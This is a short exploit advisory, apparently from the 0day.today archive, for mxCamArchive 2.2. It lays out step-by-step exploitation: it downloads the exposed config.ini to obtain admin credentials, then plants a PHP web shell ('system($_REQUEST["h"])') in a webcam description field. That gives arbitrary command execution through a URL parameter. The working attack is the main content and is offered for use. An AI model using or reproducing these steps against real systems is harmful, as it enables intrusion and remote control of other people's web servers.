id: 4188
date: 11/17/2008
title: mxCamArchive 2.2 Bypass Config Download Vulnerability
author: ahmadbady
cves: 

=====================================================
mxCamArchive 2.2 Bypass Config Download Vulnerability
=====================================================


************************(Bypass Config Download Vulnerability)*****************

script: mxcamarchive 2.2
                   
***************************************************************************
download from:http://www.infireal.com/media/serve/106/mxcamarchive2.2.zip  
                                                                                                         
***************************************************************************
...........................................................................
expl:
                                                     
http://site.com/path/archive/config.ini

and login
http://site.com/path/admin


and add new web cam
and Description   '<pre><?@system($_REQUEST["h"]);?></body></pre>'
and save


now:
http://site.com/path/index.php?h=ls -la

***************************************************
***************************************************



#  0day.today [2023-03-25]  #